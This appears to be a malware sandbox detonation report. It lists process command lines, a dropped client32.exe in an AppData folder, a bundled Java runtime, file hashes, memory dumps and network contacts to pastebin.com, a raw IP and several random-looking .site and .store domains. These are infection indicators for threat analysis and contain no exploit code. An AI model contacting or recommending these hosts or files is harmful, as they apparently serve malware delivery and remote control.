"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=712647CD1C93C35264ECFF1E4174BFE1 --mojo-platform-channel-handle=2340 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=0BF2811DA29824B2B61196B77E7E8C92 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=0BF2811DA29824B2B61196B77E7E8C92 --renderer-client-id=5 --mojo-platform-channel-handle=1992 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5BEFC56AD0A9B409506C6FDF9B2C90E2 --mojo-platform-channel-handle=2764 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AF9D0A4FD79CABE186088E9BDB3B44B9 --mojo-platform-channel-handle=2436 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Users\Admin\AppData\Roaming\TempControll\client32.exe

"C:\Users\Admin\AppData\Roaming\TempControll\client32.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 45.61.158.86:80 45.61.158.86 tcp
US 8.8.8.8:53 86.158.61.45.in-addr.arpa udp
US 8.8.8.8:53 gailsacademy.com udp
NL 23.254.231.157:443 gailsacademy.com tcp
US 8.8.8.8:53 157.231.254.23.in-addr.arpa udp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
US 8.8.8.8:53 fusion-avto.com udp
US 104.26.0.231:80 geo.netsupportsoftware.com tcp
CH 94.247.42.62:443 fusion-avto.com tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 231.0.26.104.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 62.42.247.94.in-addr.arpa udp
US 8.8.8.8:53 135.240.123.92.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 107.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 availabkelk.store udp
US 8.8.8.8:53 questionsmw.store udp
US 8.8.8.8:53 soldiefieop.site udp
US 8.8.8.8:53 abnomalrkmu.site udp
US 8.8.8.8:53 chorusarorp.site udp
US 8.8.8.8:53 treatynreit.site udp
US 8.8.8.8:53 snarlypagowo.site udp
US 8.8.8.8:53 mysterisop.site udp
US 8.8.8.8:53 absorptioniw.site udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 sergei-esenin.com udp
US 104.21.53.8:443 sergei-esenin.com tcp
US 8.8.8.8:53 109.234.82.104.in-addr.arpa udp
US 8.8.8.8:53 8.53.21.104.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\msvcr100.dll

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\client\jvm.dll

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\i386\jvm.cfg

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\verify.dll

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\java.dll

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\meta-index

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\zip.dll

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\ext\meta-index

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\asm-all.jar

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-gui-ext.jar

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-desktop-ext.jar

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-core.jar

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-app-framework.jar

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\gson.jar

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\dn-php-sdk.jar

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\dn-compiled-module.jar

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\COPYRIGHT

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-json-ext.jar

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-runtime.jar

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\ext\jfxrt.jar

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-zend-ext.jar

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-xml-ext.jar

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\currency.data

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-zip-ext.jar

MD5 20f6f88989e806d23c29686b090f6190
SHA1 1fdb9a66bb5ca587c05d3159829a8780bb66c87d
SHA256 9d5f06d539b91e98fd277fc01fd2f9af6fea58654e3b91098503b235a83abb16
SHA512 2798bb1dd0aa121cd766bd5b47d256b1a528e9db83ed61311fa685f669b7f60898118ae8c69d2a30d746af362b810b133103cbe426e0293dd2111aca1b41ccea

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\LICENSE

MD5 67cb88f6234b6a1f2320a23b197fa3f6
SHA1 877aceba17b28cfff3f5df664e03b319f23767a1
SHA256 263e21f4b43c118a8b4c07f1a8acb11cafc232886834433e34187f5663242360
SHA512 4d43e5edecab92cebd853204c941327dccbfd071a71f066c12f7fb2f1b2def59c37a15ce05c4fe06ec2ea296b8630c4e938254a8a92e149e4a0a82c4307d648f

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\zt-zip.jar

MD5 0fd8bc4f0f2e37feb1efc474d037af55
SHA1 add8fface4c1936787eb4bffe4ea944a13467d53
SHA256 1e31ef3145d1e30b31107b7afc4a61011ebca99550dce65f945c2ea4ccac714b
SHA512 29de5832db5b43fdc99bb7ea32a7359441d6cf5c05561dd0a6960b33078471e4740ee08ffbd97a5ced4b7dd9cc98fad6add43edb4418bf719f90f83c58188149

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\Welcome.html

MD5 3cb773cb396842a7a43ad4868a23abe5
SHA1 ace737f039535c817d867281190ca12f8b4d4b75
SHA256 f450aee7e8fe14512d5a4b445aa5973e202f9ed1e122a8843e4dc2d4421015f0
SHA512 6058103b7446b61613071c639581f51718c12a9e7b6abd3cf3047a3093c2e54b2d9674faf9443570a3bb141f839e03067301ff35422eb9097bd08020e0dd08a4

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\THIRDPARTYLICENSEREADME.txt

MD5 0e87879f452892b85c81071a1ddd5a2a
SHA1 2cf97c1a84374a6fbbd5d97fe1b432fa799c3b19
SHA256 9c18836fd0b5e4b0c57cffdb74574fa5549085c3b327703dc8efe4208f4e3321
SHA512 10ba68ffd9deab10a0b200707c3af9e95e27aed004f66f049d41310cb041b7618ee017219c848912d5951599208d385bcb928dd33175652101c7e5bc2e3eba5b

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt

MD5 0e05bd8b9bfcf17f142445d1f8c6561c
SHA1 cf0a9f4040603008891aa0731abf89ce2403f2fb
SHA256 c3ea3996241b8e9ae7db3780e470174076fd2003d8aefaa77bf0bab5e04de050
SHA512 07c7865d31d22ba0c68e384afedc22261f7b3a82bebc9324145ff7f631623eca2dc31c71cdbbfc9febc1733451a095302de2a0877821a5b68038e350969bf460

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\slf4j-simple.jar

MD5 722bb90689aecc523e3fe317e1f0984b
SHA1 8dacf9514f0c707cbbcdd6fd699e8940d42fb54e
SHA256 0966e86fffa5be52d3d9e7b89dd674d98a03eed0a454fbaf7c1bd9493bd9d874
SHA512 d5effbfa105bcd615e56ef983075c9ef0f52bcfdbefa3ce8cea9550f25b859e48b32f2ec9aa7a305c6611a3be5e0cde0d269588d9c2897ca987359b77213331d

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\slf4j-api.jar

MD5 caafe376afb7086dcbee79f780394ca3
SHA1 da76ca59f6a57ee3102f8f9bd9cee742973efa8a
SHA256 18c4a0095d5c1da6b817592e767bb23d29dd2f560ad74df75ff3961dbde25b79
SHA512 5dd6271fd5b34579d8e66271bab75c89baca8b2ebeaa9966de391284bd08f2d720083c6e0e1edda106ecf8a04e9a32116de6873f0f88c19c049c0fe27e5d820b

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\release

MD5 a61b1e3fe507d37f0d2f3add5ac691e0
SHA1 8ae1050ff466b8f024eed5bc067b87784f19a848
SHA256 f9e84b54cf0d8cb0645e0d89bf47ed74c88af98ac5bf9ccf3accb1a824f7dc3a
SHA512 3e88a839e44241ae642d0f9b7000d80be7cf4bd003a9e2f9f04a4feb61ec4877b2b4e76151503184f4b9978894ba1d0de034dbc5f2e51c31b3abb24f0eacf0c7

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\README.txt

MD5 4bda1f1b04053dcfe66e87a77b307bb1
SHA1 b8b35584be24be3a8e1160f97b97b2226b38fa7d
SHA256 fd475b1619675b9fb3f5cd11d448b97eddee8d1f6ddcca13ded8bc6e0caa9cf3
SHA512 997cee676018076e9e4e94d61ec94d5b69b148b3152a0148e70d0be959533a13ad0bc1e8b43268f91db08b881bf5050a6d5c157d456597260a2b332a48068980

memory/3616-330-0x0000000002360000-0x0000000002368000-memory.dmp

memory/3616-329-0x0000000002310000-0x0000000002318000-memory.dmp

memory/3616-334-0x0000000002368000-0x0000000002370000-memory.dmp

memory/3616-333-0x0000000002318000-0x0000000002320000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\security\java.security

MD5 409c132fe4ea4abe9e5eb5a48a385b61
SHA1 446d68298be43eb657934552d656fa9ae240f2a2
SHA256 4d9e5a12b8cac8b36ecd88468b1c4018bc83c97eb467141901f90358d146a583
SHA512 7fed286ac9aed03e2dae24c3864edbbf812b65965c7173cc56ce622179eb5f872f77116275e96e1d52d1c58d3cdebe4e82b540b968e95d5da656aa74ad17400d

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\jsse.jar

MD5 fd1434c81219c385f30b07e33cef9f30
SHA1 0b5ee897864c8605ef69f66dfe1e15729cfcbc59
SHA256 bc3a736e08e68ace28c68b0621dccfb76c1063bd28d7bd8fce7b20e7b7526cc5
SHA512 9a778a3843744f1fabad960aa22880d37c30b1cab29e123170d853c9469dc54a81e81a9070e1de1bf63ba527c332bb2b1f1d872907f3bdce33a6898a02fef22d

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\net.dll

MD5 691b937a898271ee2cffab20518b310b
SHA1 abedfcd32c3022326bc593ab392dea433fcf667c
SHA256 2f5f1199d277850a009458edb5202688c26dd993f68fe86ca1b946dc74a36d61
SHA512 1c09f4e35a75b336170f64b5c7254a51461dc1997b5862b62208063c6cf84a7cb2d66a67e947cbbf27e1cf34ccd68ba4e91c71c236104070ef3beb85570213ec

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\nio.dll

MD5 95edb3cb2e2333c146a4dd489ce67cbd
SHA1 79013586a6e65e2e1f80e5caf9e2aa15b7363f9a
SHA256 96cf590bddfd90086476e012d9f48a9a696efc054852ef626b43d6d62e72af31
SHA512 ab671f1bce915d748ee49518cc2a666a2715b329cab4ab8f6b9a975c99c146bb095f7a4284cd2aaf4a5b4fcf4f939f54853af3b3acc4205f89ed2ba8a33bb553

memory/3616-347-0x0000000002370000-0x0000000002378000-memory.dmp

memory/3616-346-0x0000000002320000-0x0000000002328000-memory.dmp

memory/3616-351-0x0000000002378000-0x0000000002380000-memory.dmp

memory/3616-350-0x0000000002328000-0x0000000002330000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\tzdb.dat

MD5 5a7f416bd764e4a0c2deb976b1d04b7b
SHA1 e12754541a58d7687deda517cdda14b897ff4400
SHA256 a636afa5edba8aa0944836793537d9c5b5ca0091ccc3741fc0823edae8697c9d
SHA512 3ab2ad86832b98f8e5e1ce1c1b3ffefa3c3d00b592eb1858e4a10fff88d1a74da81ad24c7ec82615c398192f976a1c15358fce9451aa0af9e65fb566731d6d8f

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\tzmappings

MD5 b8dd8953b143685b5e91abeb13ff24f0
SHA1 b5ceb39061fce39bb9d7a0176049a6e2600c419c
SHA256 3d49b3f2761c70f15057da48abe35a59b43d91fa4922be137c0022851b1ca272
SHA512 c9cd0eb1ba203c170f8196cbab1aaa067bcc86f2e52d0baf979aad370edf9f773e19f430777a5a1c66efe1ec3046f9bc82165acce3e3d1b8ae5879bd92f09c90

memory/3616-357-0x0000000002380000-0x0000000002388000-memory.dmp

memory/3616-356-0x0000000002330000-0x0000000002338000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\resources.jar

MD5 9a084b91667e7437574236cd27b7c688
SHA1 d8926cc4aa12d6fe9abe64c8c3cb8bc0f594c5b1
SHA256 a1366a75454fc0f1ca5a14ea03b4927bb8584d6d5b402dfa453122ae16dbf22d
SHA512 d603aa29e1f6eefff4b15c7ebc8a0fa18e090d2e1147d56fd80581c7404ee1cb9d6972fcf2bd0cb24926b3af4dfc5be9bce1fe018681f22a38adaa278bf22d73

memory/3616-362-0x0000000002388000-0x0000000002390000-memory.dmp

memory/3616-361-0x0000000002338000-0x0000000002340000-memory.dmp

memory/3616-366-0x0000000002390000-0x0000000002398000-memory.dmp

memory/3616-365-0x0000000002340000-0x0000000002348000-memory.dmp

memory/3616-369-0x0000000002348000-0x0000000002350000-memory.dmp

memory/3616-370-0x0000000002398000-0x00000000023A0000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\msvcr120.dll

MD5 034ccadc1c073e4216e9466b720f9849
SHA1 f19e9d8317161edc7d3e963cc0fc46bd5e4a55a1
SHA256 86e39b5995af0e042fcdaa85fe2aefd7c9ddc7ad65e6327bd5e7058bc3ab615f
SHA512 5f11ef92d936669ee834a5cef5c7d0e7703bf05d03dc4f09b9dcfe048d7d5adfaab6a9c7f42e8080a5e9aad44a35f39f3940d5cca20623d9cafe373c635570f7

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\msvcp120.dll

MD5 fd5cabbe52272bd76007b68186ebaf00
SHA1 efd1e306c1092c17f6944cc6bf9a1bfad4d14613
SHA256 87c42ca155473e4e71857d03497c8cbc28fa8ff7f2c8d72e8a1f39b71078f608
SHA512 1563c8257d85274267089cd4aeac0884a2a300ff17f84bdb64d567300543aa9cd57101d8408d0077b01a600ddf2e804f7890902c2590af103d2c53ff03d9e4a5

memory/3616-377-0x00000000023A0000-0x00000000023A8000-memory.dmp

memory/3616-376-0x0000000002350000-0x0000000002358000-memory.dmp

memory/3616-379-0x0000000002358000-0x0000000002360000-memory.dmp

memory/3616-380-0x00000000023A8000-0x00000000023B0000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\prism_d3d.dll

MD5 5aadadf700c7771f208dda7ce60de120
SHA1 e9cf7e7d1790dc63a58106c416944fd6717363a5
SHA256 89dac9792c884b70055566564aa12a8626c3aa127a89303730e66aba3c045f79
SHA512 624431a908c2a835f980391a869623ee1fa1f5a1a41f3ee08040e6395b8c11734f76fe401c4b9415f2055e46f60a7f9f2ac0a674604e5743ab8301dbadf279f2

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\glass.dll

MD5 434cbb561d7f326bbeffa2271ecc1446
SHA1 3d9639f6da2bc8ac5a536c150474b659d0177207
SHA256 1edd9022c10c27bbba2ad843310458edaead37a9767c6fc8fddaaf1adfcbc143
SHA512 9e37b985ecf0b2fef262f183c1cd26d437c8c7be97aa4ec4cd8c75c044336cc69a56a4614ea6d33dc252fe0da8e1bbadc193ff61b87be5dce6610525f321b6dc

memory/3616-390-0x0000000002360000-0x0000000002368000-memory.dmp

memory/3616-391-0x00000000023B0000-0x00000000023B8000-memory.dmp

memory/3616-392-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-398-0x00000000023B8000-0x00000000023C0000-memory.dmp

memory/3616-397-0x0000000002368000-0x0000000002370000-memory.dmp

memory/3616-399-0x0000000002370000-0x0000000002378000-memory.dmp

memory/3616-400-0x00000000023C0000-0x00000000023C8000-memory.dmp

memory/3616-404-0x00000000023C8000-0x00000000023D0000-memory.dmp

memory/3616-403-0x0000000002378000-0x0000000002380000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javafx_font.dll

MD5 aeada06201bb8f5416d5f934aaa29c87
SHA1 35bb59febe946fb869e5da6500ab3c32985d3930
SHA256 f8f0b1e283fd94bd87abca162e41afb36da219386b87b0f6a7e880e99073bda3
SHA512 89bad9d1115d030b98e49469275872fff52d8e394fe3f240282696cf31bccf0b87ff5a0e9a697a05befcfe9b24772d65ed73c5dbd168eed111700caad5808a78

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\awt.dll

MD5 159ccf1200c422ced5407fed35f7e37d
SHA1 177a216b71c9902e254c0a9908fcb46e8d5801a9
SHA256 30eb581c99c8bcbc54012aa5e6084b6ef4fcee5d9968e9cc51f5734449e1ff49
SHA512 ab3f4e3851313391b5b8055e4d526963c38c4403fa74fb70750cc6a2d5108e63a0e600978fa14a7201c48e1afd718a1c6823d091c90d77b17562b7a4c8c40365

memory/3616-412-0x00000000023D0000-0x00000000023D8000-memory.dmp

memory/3616-411-0x0000000002380000-0x0000000002388000-memory.dmp

memory/3616-416-0x00000000023D8000-0x00000000023E0000-memory.dmp

memory/3616-415-0x0000000002388000-0x0000000002390000-memory.dmp

memory/3616-418-0x00000000023E0000-0x00000000023E8000-memory.dmp

memory/3616-417-0x0000000002390000-0x0000000002398000-memory.dmp

memory/3616-419-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-423-0x00000000023E8000-0x00000000023F0000-memory.dmp

memory/3616-422-0x0000000002398000-0x00000000023A0000-memory.dmp

memory/3616-425-0x00000000023F0000-0x00000000023F8000-memory.dmp

memory/3616-424-0x00000000023A0000-0x00000000023A8000-memory.dmp

memory/3616-428-0x00000000023A8000-0x00000000023B0000-memory.dmp

memory/3616-429-0x00000000023F8000-0x0000000002400000-memory.dmp

memory/3616-432-0x0000000002400000-0x0000000002408000-memory.dmp

memory/3616-431-0x00000000023B0000-0x00000000023B8000-memory.dmp

memory/3616-434-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-436-0x0000000002408000-0x0000000002410000-memory.dmp

memory/3616-435-0x00000000023B8000-0x00000000023C0000-memory.dmp

memory/3616-439-0x0000000002410000-0x0000000002418000-memory.dmp

memory/3616-438-0x00000000023C0000-0x00000000023C8000-memory.dmp

memory/3616-440-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-444-0x0000000002418000-0x0000000002420000-memory.dmp

memory/3616-443-0x00000000023C8000-0x00000000023D0000-memory.dmp

memory/3616-449-0x0000000002420000-0x0000000002428000-memory.dmp

memory/3616-448-0x00000000023D0000-0x00000000023D8000-memory.dmp

memory/3616-454-0x0000000002428000-0x0000000002430000-memory.dmp

memory/3616-453-0x00000000023D8000-0x00000000023E0000-memory.dmp

memory/3616-457-0x0000000002430000-0x0000000002438000-memory.dmp

memory/3616-456-0x00000000023E0000-0x00000000023E8000-memory.dmp

memory/3616-460-0x0000000002438000-0x0000000002440000-memory.dmp

memory/3616-459-0x00000000023E8000-0x00000000023F0000-memory.dmp

memory/3616-463-0x0000000002440000-0x0000000002448000-memory.dmp

memory/3616-462-0x00000000023F0000-0x00000000023F8000-memory.dmp

memory/3616-467-0x0000000002448000-0x0000000002450000-memory.dmp

memory/3616-466-0x00000000023F8000-0x0000000002400000-memory.dmp

memory/3616-470-0x0000000002450000-0x0000000002458000-memory.dmp

memory/3616-469-0x0000000002400000-0x0000000002408000-memory.dmp

memory/3616-473-0x0000000002458000-0x0000000002460000-memory.dmp

memory/3616-472-0x0000000002408000-0x0000000002410000-memory.dmp

memory/3616-476-0x0000000002460000-0x0000000002468000-memory.dmp

memory/3616-475-0x0000000002410000-0x0000000002418000-memory.dmp

memory/3616-480-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-483-0x0000000002418000-0x0000000002420000-memory.dmp

memory/3616-484-0x0000000002420000-0x0000000002428000-memory.dmp

memory/3616-486-0x0000000002428000-0x0000000002430000-memory.dmp

memory/3616-487-0x0000000002430000-0x0000000002438000-memory.dmp

memory/3616-490-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-491-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-498-0x0000000002438000-0x0000000002440000-memory.dmp

memory/3616-500-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-501-0x0000000002440000-0x0000000002448000-memory.dmp

memory/3616-526-0x0000000000780000-0x0000000000781000-memory.dmp

memory/208-527-0x00007FFE4D410000-0x00007FFE4D582000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aozmvjqy.urj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/208-552-0x00007FFE4D590000-0x00007FFE4D845000-memory.dmp

memory/208-551-0x00007FFE581F0000-0x00007FFE58224000-memory.dmp

memory/208-550-0x00007FF7CB720000-0x00007FF7CB818000-memory.dmp

memory/3320-553-0x00007FFE4D6D0000-0x00007FFE4D842000-memory.dmp

memory/3616-556-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-557-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-560-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3616-561-0x0000000000780000-0x0000000000781000-memory.dmp

memory/3320-647-0x00007FFE4D6D0000-0x00007FFE4D842000-memory.dmp

memory/3320-650-0x00007FFE53800000-0x00007FFE53834000-memory.dmp

C:\Users\Admin\AppData\Roaming\TempControll\client32.exe

MD5 290c26b1579fd3e48d60181a2d22a287
SHA1 e4c91a7f161783c68cf67250206047f23bd25a29
SHA256 973836529b57815903444dd5d4b764e8730986b1bd87179552f249062ee26128
SHA512 114a9f068b36a1edf5cce9269057f0cc17b22a10cd73cbed3ef42ae71324e41363e543a3af8be57b410c533b62bcf7f28650b464cce96e0e6c14819cdb90129a

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 b30d3becc8731792523d599d949e63f5
SHA1 19350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256 b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 752a1f26b18748311b691c7d8fc20633
SHA1 c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512 a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 5d8fe5632c9254faaffa00f842a4c4cc
SHA1 461cd923dddf0e5ea639d6af48cef43b56878730
SHA256 80bb553c1ecf11cbd4dcc5ee7f73361d3862e04f3f462a8f073cde420f48d9ae
SHA512 430183c4667044a8f42b600e6f582489244452760785e44683855c7e6c86d26cbdb780d94ee36f8bf6200a0ccaf46d55eddc2b2f9031c89220630534d88f0633

Analysis: behavioral16

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:14

Platform

win10v2004-20240802-en

Max time kernel

147s

Max time network

153s

Command Line

